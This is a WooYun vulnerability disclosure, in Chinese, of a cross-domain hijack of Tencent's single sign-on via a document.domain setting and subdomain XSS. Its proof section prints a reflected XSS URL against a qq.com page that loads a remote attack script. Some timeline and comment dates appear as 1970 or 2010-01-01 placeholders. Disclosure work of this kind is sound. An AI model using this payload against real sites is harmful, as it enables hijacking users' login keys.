腾讯单点登录系统跨域劫持漏洞

漏洞概要

缺陷编号:WooYun-2010-0118

漏洞标题:腾讯单点登录系统跨域劫持漏洞

相关厂商:腾讯

漏洞作者:rayh4c

提交时间:2010-07-27 01:39

公开时间:2010-08-26 03:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-26: 细节向公众公开

简要描述:

腾讯单点登录系统在安全架构上存在安全缺陷,黑客可以轻易通过一些漏洞跨域劫持单点登录系统,从而获取客户端QQ所有相关服务的权限。

详细说明:

QQ的快速登录插件的信任域是xui.ptlogin2.qq.com,其单点登录页面存在一个跨域设置document.domain='qq.com',通过其他*.qq.com下的WEB应用能够注入脚本到信任域xui.ptlogin2.qq.com,从而操作快速登录插件盗取用户的密钥。

漏洞证明:

随便找QQ分站的一个XSS漏洞即可攻击。1.通过XSS漏洞注入远程的攻击脚本 http://127.0.0.1/xss.jshttp://product.tech.qq.com/simp_search.php?keyword="></script><script/src=http://127.0.0.1/xss.js></script>2.快速登录插件攻击测试脚本XSS.JS

修复方案:

和开发人员沟通,彻底清查快速登录服务应用是否添加了不安全的跨域设置或其他危险的信任域。

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2010-07-27 01:39

厂商回复:

收到,我们尽快确认

最新状态:

暂无

评价

  1. 2010-01-01 00:00 苏南同学 白帽子 | Rank:41 漏洞数:5)

    看不明白

  2. 2010-01-01 00:00 苏南同学 白帽子 | Rank:41 漏洞数:5)

    window.name是什么意思呢?

  3. 2010-01-01 00:00 Drizzle.Risk 白帽子 | Rank:220 漏洞数:19)

    洞主威武~

  4. 2010-01-01 00:00 小贱人 白帽子 | Rank:4 漏洞数:3)

    mark

  5. 2010-01-01 00:00 he1renyagao 白帽子 | Rank:224 漏洞数:28)

    mark

  6. 2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)

    目测腾讯这个不会修了。。不然应该会影响太多正常业务了